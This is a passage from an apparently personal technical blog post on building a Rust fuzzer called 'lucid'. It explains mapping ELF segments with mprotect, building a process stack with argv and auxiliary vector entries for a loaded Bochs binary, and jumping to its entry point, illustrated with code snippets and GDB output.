    <span class="k">let</span> <span class="n">src</span> <span class="o">=</span> <span class="p">(</span><span class="n">elf</span><span class="py">.data</span><span class="p">[</span><span class="n">segment</span><span class="na">.3</span><span class="o">..</span><span class="n">segment</span><span class="na">.3</span> <span class="o">+</span> <span class="n">len</span><span class="p">])</span><span class="nf">.as_ptr</span><span class="p">();</span>

    <span class="k">unsafe</span> <span class="p">{</span>
        <span class="nn">std</span><span class="p">::</span><span class="nn">ptr</span><span class="p">::</span><span class="nf">copy_nonoverlapping</span><span class="p">(</span><span class="n">src</span><span class="p">,</span> <span class="n">dst</span><span class="p">,</span> <span class="n">len</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Calculate the `mprotect` address by adding the mmap address plus the</span>
    <span class="c1">// virtual address offset, we also mask off the last 0x1000 bytes so </span>
    <span class="c1">// that we are always page-aligned as required by `mprotect`</span>
    <span class="k">let</span> <span class="n">mprotect_addr</span> <span class="o">=</span> <span class="p">((</span><span class="n">addr</span> <span class="o">+</span> <span class="n">segment</span><span class="na">.1</span><span class="p">)</span> <span class="o">&amp;</span> <span class="o">!</span><span class="p">(</span><span class="n">PAGE_SIZE</span> <span class="o">-</span> <span class="mi">1</span><span class="p">))</span>
        <span class="k">as</span> <span class="o">*</span><span class="k">mut</span> <span class="nn">libc</span><span class="p">::</span><span class="nb">c_void</span><span class="p">;</span>

    <span class="c1">// Get the length</span>
    <span class="k">let</span> <span class="n">mprotect_len</span> <span class="o">=</span> <span class="n">segment</span><span class="na">.2</span> <span class="k">as</span> <span class="nn">libc</span><span class="p">::</span><span class="nb">size_t</span><span class="p">;</span>

    <span class="c1">// Get the protection</span>
    <span class="k">let</span> <span class="k">mut</span> <span class="n">mprotect_prot</span> <span class="o">=</span> <span class="mi">0</span> <span class="k">as</span> <span class="nn">libc</span><span class="p">::</span><span class="nb">c_int</span><span class="p">;</span>
    <span class="k">if</span> <span class="n">segment</span><span class="na">.0</span> <span class="o">&amp;</span> <span class="mi">0x1</span> <span class="o">==</span> <span class="mi">0x1</span> <span class="p">{</span> <span class="n">mprotect_prot</span> <span class="p">|</span><span class="o">=</span> <span class="nn">libc</span><span class="p">::</span><span class="n">PROT_EXEC</span><span class="p">;</span> <span class="p">}</span>
    <span class="k">if</span> <span class="n">segment</span><span class="na">.0</span> <span class="o">&amp;</span> <span class="mi">0x2</span> <span class="o">==</span> <span class="mi">0x2</span> <span class="p">{</span> <span class="n">mprotect_prot</span> <span class="p">|</span><span class="o">=</span> <span class="nn">libc</span><span class="p">::</span><span class="n">PROT_WRITE</span><span class="p">;</span> <span class="p">}</span>
    <span class="k">if</span> <span class="n">segment</span><span class="na">.0</span> <span class="o">&amp;</span> <span class="mi">0x4</span> <span class="o">==</span> <span class="mi">0x4</span> <span class="p">{</span> <span class="n">mprotect_prot</span> <span class="p">|</span><span class="o">=</span> <span class="nn">libc</span><span class="p">::</span><span class="n">PROT_READ</span><span class="p">;</span> <span class="p">}</span>

    <span class="c1">// Call `mprotect` to change the mapping perms</span>
    <span class="k">let</span> <span class="n">result</span> <span class="o">=</span> <span class="k">unsafe</span> <span class="p">{</span>
        <span class="nn">libc</span><span class="p">::</span><span class="nf">mprotect</span><span class="p">(</span>
            <span class="n">mprotect_addr</span><span class="p">,</span>
            <span class="n">mprotect_len</span><span class="p">,</span>
            <span class="n">mprotect_prot</span>
        <span class="p">)</span>
    <span class="p">};</span>

    <span class="k">if</span> <span class="n">result</span> <span class="o">&lt;</span> <span class="mi">0</span> <span class="p">{</span>
        <span class="k">return</span> <span class="nf">Err</span><span class="p">(</span><span class="nn">LucidErr</span><span class="p">::</span><span class="nf">from</span><span class="p">(</span><span class="s">"Failed to `mprotect` memory for Bochs"</span><span class="p">));</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>After that is successful, our ELF image is basically complete. We can just jump to it and start executing! Just kidding, we have to first setup a stack for the new “process” which I learned was a huge pain.</p>

<h2 id="setting-up-a-stack-for-bochs">Setting Up a Stack for Bochs</h2>
<p>I spent a lot of time on this and there actually might still be bugs! This was the hardest part I’d say as everything else was pretty much straightforward. To complete this part, I heavily leaned on this resource which describes how x86 32-bit application stacks are fabricated: <a href="https://articles.manugarg.com/aboutelfauxiliaryvectors">https://articles.manugarg.com/aboutelfauxiliaryvectors</a>.</p>

<p>Here is an extremely useful diagram describing the 32-bit stack cribbed from the linked resource above:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>position            content                     size (bytes) + comment
  ------------------------------------------------------------------------
  stack pointer -&gt;  [ argc = number of args ]     4
                    [ argv[0] (pointer) ]         4   (program name)
                    [ argv[1] (pointer) ]         4
                    [ argv[..] (pointer) ]        4 * x
                    [ argv[n - 1] (pointer) ]     4
                    [ argv[n] (pointer) ]         4   (= NULL)

                    [ envp[0] (pointer) ]         4
                    [ envp[1] (pointer) ]         4
                    [ envp[..] (pointer) ]        4
                    [ envp[term] (pointer) ]      4   (= NULL)

                    [ auxv[0] (Elf32_auxv_t) ]    8
                    [ auxv[1] (Elf32_auxv_t) ]    8
                    [ auxv[..] (Elf32_auxv_t) ]   8
                    [ auxv[term] (Elf32_auxv_t) ] 8   (= AT_NULL vector)

                    [ padding ]                   0 - 16

                    [ argument ASCIIZ strings ]   &gt;= 0
                    [ environment ASCIIZ str. ]   &gt;= 0

  (0xbffffffc)      [ end marker ]                4   (= NULL)

  (0xc0000000)      &lt; bottom of stack &gt;           0   (virtual)
  ------------------------------------------------------------------------
</code></pre></div></div>

<p>When we pass arguments to a process on the command line like <code class="language-plaintext highlighter-rouge">ls / -laht</code>, the Linux OS has to load the <code class="language-plaintext highlighter-rouge">ls</code> ELF into memory and create its environment. In this example, we passed a couple argument values to the process as well <code class="language-plaintext highlighter-rouge">/</code> and <code class="language-plaintext highlighter-rouge">-laht</code>. The way that the OS passes these arguments to the process is on the stack via the argument vector or <code class="language-plaintext highlighter-rouge">argv</code> for short, which is an array of string pointers. The number of arguments is represented by the argument count or <code class="language-plaintext highlighter-rouge">argc</code>. The first member of <code class="language-plaintext highlighter-rouge">argv</code> is usually the name of the executable that was passed on the command line, so in our example it would be <code class="language-plaintext highlighter-rouge">ls</code>. As you can see the first thing on the stack, the top of the stack, which is at the lower end of the address range of the stack, is <code class="language-plaintext highlighter-rouge">argc</code>, followed by all the pointers to string data representing the program arguments. It is also important to note that the array is <code class="language-plaintext highlighter-rouge">NULL</code> terminated at the end.</p>

<p>After that, we have a similar data structure with the <code class="language-plaintext highlighter-rouge">envp</code> array, which is an array of pointers to string data representing environment variables. You can retrieve this data yourself by running a program under GDB and using the command <code class="language-plaintext highlighter-rouge">show environment</code>, the environment variables are usually in the form “KEY=VALUE”, for instance on my machine the key-value pair for the language environment variable is <code class="language-plaintext highlighter-rouge">"LANG=en_US.UTF-8"</code>. For our purposes, we can ignore the environment variables. This vector is also <code class="language-plaintext highlighter-rouge">NULL</code> terminated.</p>

<p>Next, is the auxiliary vector, which is extremely important to us. This information details several aspects of the program. These auxiliary entries in the vector are 16-bytes a piece. They comprise a key and a value just like our environment variable entries, but these are basically u64 values. For the <code class="language-plaintext highlighter-rouge">test</code> program, we can actually dump the auxiliary information by using <code class="language-plaintext highlighter-rouge">info aux</code> under GDB.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">gef➤  info aux
33   AT_SYSINFO_EHDR      System-supplied DSO's ELF header 0x7ffff7f2e000
51   ???                                                 0xe30
16   AT_HWCAP             Machine-dependent CPU capability hints 0x1f8bfbff
6    AT_PAGESZ            System page size               4096
17   AT_CLKTCK            Frequency of times()           100
3    AT_PHDR              Program headers for program    0x7ffff7f30040
4    AT_PHENT             Size of program header entry   56
5    AT_PHNUM             Number of program headers      12
7    AT_BASE              Base address of interpreter    0x0
8    AT_FLAGS             Flags                          0x0
9    AT_ENTRY             Entry point of program         0x7ffff7f39f50
11   AT_UID               Real user ID                   1000
12   AT_EUID              Effective user ID              1000
13   AT_GID               Real group ID                  1000
14   AT_EGID              Effective group ID             1000
23   AT_SECURE            Boolean, was exec setuid-like? 0
25   AT_RANDOM            Address of 16 random bytes     0x7fffffffe3b9
26   AT_HWCAP2            Extension of AT_HWCAP          0x2
31   AT_EXECFN            File name of executable        0x7fffffffefe2 "/home/dude/lucid/test"
15   AT_PLATFORM          String identifying platform    0x7fffffffe3c9 "x86_64"
0    AT_NULL              End of vector                  0x0
</span></code></pre></div></div>

<p>The keys are on the left the values are on the right. For instance, on the stack we can expect the value 0x5 for <code class="language-plaintext highlighter-rouge">AT_PHNUM</code>, which describes the number of Program Headers, to be accompanied by <code class="language-plaintext highlighter-rouge">12</code> as the value. We can dump the stack and see this in action as well.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">gef➤  x/400gx $</span>rsp
<span class="go">0x7fffffffe0b0:	0x0000000000000001	0x00007fffffffe3d6
0x7fffffffe0c0:	0x0000000000000000	0x00007fffffffe3ec
0x7fffffffe0d0:	0x00007fffffffe3fc	0x00007fffffffe44e
0x7fffffffe0e0:	0x00007fffffffe461	0x00007fffffffe475
0x7fffffffe0f0:	0x00007fffffffe4a2	0x00007fffffffe4b9
0x7fffffffe100:	0x00007fffffffe4e5	0x00007fffffffe505
0x7fffffffe110:	0x00007fffffffe52e	0x00007fffffffe542
0x7fffffffe120:	0x00007fffffffe559	0x00007fffffffe56c
0x7fffffffe130:	0x00007fffffffe588	0x00007fffffffe59d
0x7fffffffe140:	0x00007fffffffe5b8	0x00007fffffffe5c5
0x7fffffffe150:	0x00007fffffffe5da	0x00007fffffffe60e
0x7fffffffe160:	0x00007fffffffe61d	0x00007fffffffe646
0x7fffffffe170:	0x00007fffffffe667	0x00007fffffffe674
0x7fffffffe180:	0x00007fffffffe67d	0x00007fffffffe68d
0x7fffffffe190:	0x00007fffffffe69b	0x00007fffffffe6ad
0x7fffffffe1a0:	0x00007fffffffe6be	0x00007fffffffeca0
0x7fffffffe1b0:	0x00007fffffffecc1	0x00007fffffffeccd
0x7fffffffe1c0:	0x00007fffffffecde	0x00007fffffffed34
0x7fffffffe1d0:	0x00007fffffffed63	0x00007fffffffed73
0x7fffffffe1e0:	0x00007fffffffed8b	0x00007fffffffedad
0x7fffffffe1f0:	0x00007fffffffedc4	0x00007fffffffedd8
0x7fffffffe200:	0x00007fffffffedf8	0x00007fffffffee02
0x7fffffffe210:	0x00007fffffffee21	0x00007fffffffee2c
0x7fffffffe220:	0x00007fffffffee34	0x00007fffffffee46
0x7fffffffe230:	0x00007fffffffee65	0x00007fffffffee7c
0x7fffffffe240:	0x00007fffffffeed1	0x00007fffffffef7b
0x7fffffffe250:	0x00007fffffffef8d	0x00007fffffffefc3
0x7fffffffe260:	0x0000000000000000	0x0000000000000021
0x7fffffffe270:	0x00007ffff7f2e000	0x0000000000000033
0x7fffffffe280:	0x0000000000000e30	0x0000000000000010
0x7fffffffe290:	0x000000001f8bfbff	0x0000000000000006
0x7fffffffe2a0:	0x0000000000001000	0x0000000000000011
0x7fffffffe2b0:	0x0000000000000064	0x0000000000000003
0x7fffffffe2c0:	0x00007ffff7f30040	0x0000000000000004
0x7fffffffe2d0:	0x0000000000000038	0x0000000000000005
0x7fffffffe2e0:	0x000000000000000c	0x0000000000000007
</span></code></pre></div></div>

<p>You can see the towards the end of the data at <code class="language-plaintext highlighter-rouge">0x7fffffffe2d8</code> we can see the key <code class="language-plaintext highlighter-rouge">0x5</code>, and at <code class="language-plaintext highlighter-rouge">0x7fffffffe2e0</code> we can see the value <code class="language-plaintext highlighter-rouge">0xc</code> which is 12 in hex. We need some of these in order to load our ELF properly as the ELF <code class="language-plaintext highlighter-rouge">_start</code> routine requires some of them in order to set the environment up properly. The ones I included on my stack were the following, they might not all be necessary:</p>
<ul>
  <li><code class="language-plaintext highlighter-rouge">AT_ENTRY</code> which holds the program entry point,</li>
  <li><code class="language-plaintext highlighter-rouge">AT_PHDR</code> which is a pointer to the program header data,</li>
  <li><code class="language-plaintext highlighter-rouge">AT_PHNUM</code> which is the number of program headers,</li>
  <li><code class="language-plaintext highlighter-rouge">AT_RANDOM</code> which is a pointer to 16-bytes of a random seed, which is supposed to be placed by the kernel. This 16-byte value serves as an RNG seed to construct stack canary values. I found out that the program we load actually does need this information because I ended up with a NULL-ptr deref during my initial testing and then placed this auxp pair with a value of <code class="language-plaintext highlighter-rouge">0x4141414141414141</code> and ended up crashing trying to access that address. For our purposes, we don’t really care that the stack canary values are crytographically secure, so I just placed another pointer to the program entry as that is guaranteed to exist.</li>
  <li><code class="language-plaintext highlighter-rouge">AT_NULL</code> which is used to terminate the auxiliary vector</li>
</ul>

<p>So with those values all accounted for, we now know all of the data we need to construct the program’s stack.</p>

<h2 id="allocating-the-stack">Allocating the Stack</h2>
<p>First, we need to allocate memory to hold the Bochs stack since we will need to know the address it’s mapped at in order to formulate our pointers. We will know offsets within a vector representing the stack data, but we won’t know what the absolute addresses are unless we know ahead of time where this stack is going in memory. Allocating the stack was very straightforward as I just used <code class="language-plaintext highlighter-rouge">mmap</code> the same way we did with the program segments. Right now I’m using a <code class="language-plaintext highlighter-rouge">1MB</code> stack which seems to be large enough.</p>

<h2 id="constructing-the-stack-data">Constructing the Stack Data</h2>
<p>In my stack creation logic, I created the stack starting from the bottom and then inserting values on top of the stack.</p>

<p>So the first value we place onto the stack is the “end-marker” from the diagram which is just a <code class="language-plaintext highlighter-rouge">0u64</code> in Rust.</p>

<p>Next, we need to place all of the strings we need onto the stack, namely our command line arguments. To separate command line arguments meant for the fuzzer from command line arguments meant for Bochs, I created a command line argument <code class="language-plaintext highlighter-rouge">--bochs-args</code> which is meant to serve as a delineation point between the two argument categories. Every argument after <code class="language-plaintext highlighter-rouge">--bochs-args</code> is meant for Bochs. I iterate through all of the command line arguments provided and then place them onto the stack. I also log the length of each string argument so that later on, we can calculate their absolute address for when we need to place pointers to the strings in the <code class="language-plaintext highlighter-rouge">argv</code> vector. As a sidenote, I also made sure that we maintained 8-byte alignment throughout the string pushing routine just so we didn’t have to deal with any weird pointer values. This isn’t necessary but makes the stack state easier for me to reason about. This is performed with the following logic:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Create a vector to hold all of our stack data</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">stack_data</span> <span class="o">=</span> <span class="nn">Vec</span><span class="p">::</span><span class="nf">new</span><span class="p">();</span>

<span class="c1">// Add the "end-marker" NULL, we're skipping adding any envvar strings for</span>
<span class="c1">// now</span>
<span class="nf">push_u64</span><span class="p">(</span><span class="o">&amp;</span><span class="k">mut</span> <span class="n">stack_data</span><span class="p">,</span> <span class="mi">0u64</span><span class="p">);</span>

<span class="c1">// Parse the argv entries for Bochs</span>
<span class="k">let</span> <span class="n">args</span> <span class="o">=</span> <span class="nf">parse_bochs_args</span><span class="p">();</span>

<span class="c1">// Store the length of the strings including padding</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">arg_lens</span> <span class="o">=</span> <span class="nn">Vec</span><span class="p">::</span><span class="nf">new</span><span class="p">();</span>

<span class="c1">// For each argument, push a string onto the stack and store its offset </span>
<span class="c1">// location</span>
<span class="k">for</span> <span class="n">arg</span> <span class="k">in</span> <span class="n">args</span><span class="nf">.iter</span><span class="p">()</span> <span class="p">{</span>
    <span class="k">let</span> <span class="n">old_len</span> <span class="o">=</span> <span class="n">stack_data</span><span class="nf">.len</span><span class="p">();</span>
    <span class="nf">push_string</span><span class="p">(</span><span class="o">&amp;</span><span class="k">mut</span> <span class="n">stack_data</span><span class="p">,</span> <span class="n">arg</span><span class="nf">.to_string</span><span class="p">());</span>

    <span class="c1">// Calculate arg length and store it</span>
    <span class="k">let</span> <span class="n">arg_len</span> <span class="o">=</span> <span class="n">stack_data</span><span class="nf">.len</span><span class="p">()</span> <span class="o">-</span> <span class="n">old_len</span><span class="p">;</span>
    <span class="n">arg_lens</span><span class="nf">.push</span><span class="p">(</span><span class="n">arg_len</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Pushing strings is performed like this:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Pushes a NULL terminated string onto the "stack" and pads the string with </span>
<span class="c1">// NULL bytes until we achieve 8-byte alignment</span>
<span class="k">fn</span> <span class="nf">push_string</span><span class="p">(</span><span class="n">stack</span><span class="p">:</span> <span class="o">&amp;</span><span class="k">mut</span> <span class="nb">Vec</span><span class="o">&lt;</span><span class="nb">u8</span><span class="o">&gt;</span><span class="p">,</span> <span class="n">string</span><span class="p">:</span> <span class="nb">String</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Convert the string to bytes and append it to the stack</span>
    <span class="k">let</span> <span class="k">mut</span> <span class="n">bytes</span> <span class="o">=</span> <span class="n">string</span><span class="nf">.as_bytes</span><span class="p">()</span><span class="nf">.to_vec</span><span class="p">();</span>

    <span class="c1">// Add a NULL terminator</span>
    <span class="n">bytes</span><span class="nf">.push</span><span class="p">(</span><span class="mi">0x0</span><span class="p">);</span>

    <span class="c1">// We're adding bytes in reverse because we're adding to index 0 always,</span>
    <span class="c1">// we want to pad these strings so that they remain 8-byte aligned so that</span>
    <span class="c1">// the stack is easier to reason about imo</span>
    <span class="k">if</span> <span class="n">bytes</span><span class="nf">.len</span><span class="p">()</span> <span class="o">%</span> <span class="n">U64_SIZE</span> <span class="o">&gt;</span> <span class="mi">0</span> <span class="p">{</span>
        <span class="k">let</span> <span class="n">pad</span> <span class="o">=</span> <span class="n">U64_SIZE</span> <span class="o">-</span> <span class="p">(</span><span class="n">bytes</span><span class="nf">.len</span><span class="p">()</span> <span class="o">%</span> <span class="n">U64_SIZE</span><span class="p">);</span>
        <span class="k">for</span> <span class="n">_</span> <span class="k">in</span> <span class="mi">0</span><span class="o">..</span><span class="n">pad</span> <span class="p">{</span> <span class="n">bytes</span><span class="nf">.push</span><span class="p">(</span><span class="mi">0x0</span><span class="p">);</span> <span class="p">}</span>
    <span class="p">}</span>

    <span class="k">for</span> <span class="o">&amp;</span><span class="n">byte</span> <span class="k">in</span> <span class="n">bytes</span><span class="nf">.iter</span><span class="p">()</span><span class="nf">.rev</span><span class="p">()</span> <span class="p">{</span>
        <span class="n">stack</span><span class="nf">.insert</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">byte</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Then we add some padding and the auxiliary vector members:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Add some padding</span>
<span class="nf">push_u64</span><span class="p">(</span><span class="o">&amp;</span><span class="k">mut</span> <span class="n">stack_data</span><span class="p">,</span> <span class="mi">0u64</span><span class="p">);</span>

<span class="c1">// Next we need to set up the auxiliary vectors, terminate the vector with</span>
<span class="c1">// the AT_NULL key which is 0, with a value of 0</span>
<span class="nf">push_u64</span><span class="p">(</span><span class="o">&amp;</span><span class="k">mut</span> <span class="n">stack_data</span><span class="p">,</span> <span class="mi">0u64</span><span class="p">);</span>
<span class="nf">push_u64</span><span class="p">(</span><span class="o">&amp;</span><span class="k">mut</span> <span class="n">stack_data</span><span class="p">,</span> <span class="mi">0u64</span><span class="p">);</span>

<span class="c1">// Add the AT_ENTRY key which is 9, along with the value from the Elf header</span>
<span class="c1">// for the program's entry point. We need to calculate </span>
<span class="nf">push_u64</span><span class="p">(</span><span class="o">&amp;</span><span class="k">mut</span> <span class="n">stack_data</span><span class="p">,</span> <span class="n">elf</span><span class="py">.elf_header.entry</span> <span class="o">+</span> <span class="n">base</span> <span class="k">as</span> <span class="nb">u64</span><span class="p">);</span>
<span class="nf">push_u64</span><span class="p">(</span><span class="o">&amp;</span><span class="k">mut</span> <span class="n">stack_data</span><span class="p">,</span> <span class="mi">9u64</span><span class="p">);</span>

<span class="c1">// Add the AT_PHDR key which is 3, along with the address of the program</span>
<span class="c1">// headers which is just ELF_HDR_SIZE away from the base</span>
<span class="nf">push_u64</span><span class="p">(</span><span class="o">&amp;</span><span class="k">mut</span> <span class="n">stack_data</span><span class="p">,</span> <span class="p">(</span><span class="n">base</span> <span class="o">+</span> <span class="n">ELF_HDR_SIZE</span><span class="p">)</span> <span class="k">as</span> <span class="nb">u64</span><span class="p">);</span>
<span class="nf">push_u64</span><span class="p">(</span><span class="o">&amp;</span><span class="k">mut</span> <span class="n">stack_data</span><span class="p">,</span> <span class="mi">3u64</span><span class="p">);</span>

<span class="c1">// Add the AT_PHNUM key which is 5, along with the number of program headers</span>
<span class="nf">push_u64</span><span class="p">(</span><span class="o">&amp;</span><span class="k">mut</span> <span class="n">stack_data</span><span class="p">,</span> <span class="n">elf</span><span class="py">.program_headers</span><span class="nf">.len</span><span class="p">()</span> <span class="k">as</span> <span class="nb">u64</span><span class="p">);</span>
<span class="nf">push_u64</span><span class="p">(</span><span class="o">&amp;</span><span class="k">mut</span> <span class="n">stack_data</span><span class="p">,</span> <span class="mi">5u64</span><span class="p">);</span>

<span class="c1">// Add AT_RANDOM key which is 25, this is where the start routines will </span>
<span class="c1">// expect 16 bytes of random data as a seed to generate stack canaries, we</span>
<span class="c1">// can just use the entry again since we don't care about security</span>
<span class="nf">push_u64</span><span class="p">(</span><span class="o">&amp;</span><span class="k">mut</span> <span class="n">stack_data</span><span class="p">,</span> <span class="n">elf</span><span class="py">.elf_header.entry</span> <span class="o">+</span> <span class="n">base</span> <span class="k">as</span> <span class="nb">u64</span><span class="p">);</span>
<span class="nf">push_u64</span><span class="p">(</span><span class="o">&amp;</span><span class="k">mut</span> <span class="n">stack_data</span><span class="p">,</span> <span class="mi">25u64</span><span class="p">);</span>
</code></pre></div></div>

<p>Then, since we ignored the environment variables, we just push a <code class="language-plaintext highlighter-rouge">NULL</code> pointer onto the stack and also the <code class="language-plaintext highlighter-rouge">NULL</code> pointer terminating the <code class="language-plaintext highlighter-rouge">argv</code> vector:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Since we skipped ennvars for now, envp[0] is going to be NULL</span>
<span class="nf">push_u64</span><span class="p">(</span><span class="o">&amp;</span><span class="k">mut</span> <span class="n">stack_data</span><span class="p">,</span> <span class="mi">0u64</span><span class="p">);</span>

<span class="c1">// argv[n] is a NULL</span>
<span class="nf">push_u64</span><span class="p">(</span><span class="o">&amp;</span><span class="k">mut</span> <span class="n">stack_data</span><span class="p">,</span> <span class="mi">0u64</span><span class="p">);</span>
</code></pre></div></div>

<p>This is where I spent a lot of time debugging. We now have to add the pointers to our arguments. To do this, I first calculated the total length of the stack data now that we know all of the variable parts like the number of arguments and the length of all the strings. We have the stack length as it currently exists which includes the strings, and we know how many pointers and members we have left to add to the stack (number of args and <code class="language-plaintext highlighter-rouge">argc</code>). Since we know this, we can calculate the absolute addresses of where the string data will be as we push the <code class="language-plaintext highlighter-rouge">argv</code> pointers onto the stack. We calculate the length as follows:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// At this point, we have all the information we need to calculate the total</span>
<span class="c1">// length of the stack. We're missing the argv pointers and finally argc</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">stack_length</span> <span class="o">=</span> <span class="n">stack_data</span><span class="nf">.len</span><span class="p">();</span>

<span class="c1">// Add argv pointers</span>
<span class="n">stack_length</span> <span class="o">+=</span> <span class="n">args</span><span class="nf">.len</span><span class="p">()</span> <span class="o">*</span> <span class="n">POINTER_SIZE</span><span class="p">;</span>

<span class="c1">// Add argc</span>
<span class="n">stack_length</span> <span class="o">+=</span> <span class="nn">std</span><span class="p">::</span><span class="nn">mem</span><span class="p">::</span><span class="nn">size_of</span><span class="p">::</span><span class="o">&lt;</span><span class="nb">u64</span><span class="o">&gt;</span><span class="p">();</span>
</code></pre></div></div>

<p>Next, we start at the bottom of the stack and create a movable <code class="language-plaintext highlighter-rouge">offset</code> which will track through the stack stopping at the beginning of each string so that we can calculate its absolute address. The <code class="language-plaintext highlighter-rouge">offset</code> represents how deep into the stack from the top we are. At first, the <code class="language-plaintext highlighter-rouge">offset</code> is the largest value it can be because it’s at the bottom of the stack (higher-memory address). We subtract from it in order to point us towards the beginning of each <code class="language-plaintext highlighter-rouge">argv</code> string we pushed onto the stack. So the bottom of the stack looks something like this:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>NULL
string_1
string_2
end-marker &lt;--- offset
</code></pre></div></div>

<p>So armed with the arguments and their lengths that we recorded, we can adjust the <code class="language-plaintext highlighter-rouge">offset</code> each time we iterate through the argument lengths to point to the beginning of the strings. There is one gotcha though, on the first iteration, we have to account for the end-marker and its 8-bytes. So this is how the logic goes:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Right now our offset is at the bottom of the stack, for the first</span>
<span class="c1">// argument calculation, we have to accomdate the "end-marker" that we added</span>
<span class="c1">// to the stack at the beginning. So we need to move the offset up the size</span>
<span class="c1">// of the end-marker and then the size of the argument itself. After that,</span>
<span class="c1">// we only have to accomodate the argument lengths when moving the offset</span>
<span class="k">for</span> <span class="p">(</span><span class="n">idx</span><span class="p">,</span> <span class="n">arg_len</span><span class="p">)</span> <span class="k">in</span> <span class="n">arg_lens</span><span class="nf">.iter</span><span class="p">()</span><span class="nf">.enumerate</span><span class="p">()</span> <span class="p">{</span>
    <span class="c1">// First argument, account for end-marker</span>
    <span class="k">if</span> <span class="n">idx</span> <span class="o">==</span> <span class="mi">0</span> <span class="p">{</span>
        <span class="n">curr_offset</span> <span class="o">-=</span> <span class="n">arg_len</span> <span class="o">+</span> <span class="n">U64_SIZE</span><span class="p">;</span>
    <span class="p">}</span>
    
    <span class="c1">// Not the first argument, just account for the string length</span>
    <span class="k">else</span> <span class="p">{</span>
        <span class="n">curr_offset</span> <span class="o">-=</span> <span class="n">arg_len</span><span class="p">;</span>
    <span class="p">}</span>
    
    <span class="c1">// Calculate the absolute address</span>
    <span class="k">let</span> <span class="n">absolute_addr</span> <span class="o">=</span> <span class="p">(</span><span class="n">stack_addr</span> <span class="o">+</span> <span class="n">curr_offset</span><span class="p">)</span> <span class="k">as</span> <span class="nb">u64</span><span class="p">;</span>

    <span class="c1">// Push the absolute address onto the stack</span>
    <span class="nf">push_u64</span><span class="p">(</span><span class="o">&amp;</span><span class="k">mut</span> <span class="n">stack_data</span><span class="p">,</span> <span class="n">absolute_addr</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>It’s pretty cool! And it seems to work? Finally we cap the stack off with <code class="language-plaintext highlighter-rouge">argc</code> and we are done populating all of the stack data in a vector. Next, we’ll want to actually copy the data onto the stack allocation which is straightforward so no code snippet there.</p>

<p>The last piece of information I think worth noting here is that I created a constant called <code class="language-plaintext highlighter-rouge">STACK_DATA_MAX</code> and the length of the stack data cannot be more than that tunable value. We use this value to set up <code class="language-plaintext highlighter-rouge">RSP</code> when we jump to the program in memory and start executing. <code class="language-plaintext highlighter-rouge">RSP</code> is set so that it is at the absolute lowest address possible, which is the stack allocation size - <code class="language-plaintext highlighter-rouge">STACK_DATA_MAX</code>. This way, when the stack grows, we have left the maximum amount of slack space possible for the stack to grow into since the stack grows down in memory.</p>

<h2 id="executing-the-loaded-program">Executing the Loaded Program</h2>
<p>Everything at this point should be setup perfectly in memory and all we have to do is jump to the target code and start executing. For now, I haven’t fleshed out a context switching routine or anything we’re literally just going to jump to the program and execute it and hope everything goes well. The code I used to achieve this is very simple:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">pub</span> <span class="k">fn</span> <span class="nf">start_bochs</span><span class="p">(</span><span class="n">bochs</span><span class="p">:</span> <span class="n">Bochs</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Set RAX to our jump destination which is the program entry, clear RDX,</span>
    <span class="c1">// and set RSP to the correct value</span>
    <span class="k">unsafe</span> <span class="p">{</span>
        <span class="nd">asm!</span><span class="p">(</span>
            <span class="s">"mov rax, {0}"</span><span class="p">,</span>
            <span class="s">"mov rsp, {1}"</span><span class="p">,</span>
            <span class="s">"xor rdx, rdx"</span><span class="p">,</span>
            <span class="s">"jmp rax"</span><span class="p">,</span>
            <span class="k">in</span><span class="p">(</span><span class="n">reg</span><span class="p">)</span> <span class="n">bochs</span><span class="py">.entry</span><span class="p">,</span>
            <span class="k">in</span><span class="p">(</span><span class="n">reg</span><span class="p">)</span> <span class="n">bochs</span><span class="py">.rsp</span><span class="p">,</span>
        <span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The reason we clear <code class="language-plaintext highlighter-rouge">RDX</code> is because if the <code class="language-plaintext highlighter-rouge">_start</code> routine sees a non-zero value in <code class="language-plaintext highlighter-rouge">RDX</code>, it will interpret that to mean that we are attempting to register a hook located at the address in <code class="language-plaintext highlighter-rouge">RDX</code> to be invoked when the program exits, we don’t have one we want to run so for now we <code class="language-plaintext highlighter-rouge">NULL</code> it out. The other register values don’t really matter. We move the program entry point into <code class="language-plaintext highlighter-rouge">RAX</code> and use it as a long jump target and we supply our handcrafted <code class="language-plaintext highlighter-rouge">RSP</code> so that the program has a stack to use to do its relocations and run properly.</p>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">dude@lol:~/lucid/target/release$</span><span class="w"> </span>./lucid <span class="nt">--bochs-args</span> <span class="nt">-AAAAA</span> <span class="nt">-BBBBBBBBBB</span>
<span class="gp">[17:43:19] lucid&gt;</span><span class="w"> </span>Loading Bochs...
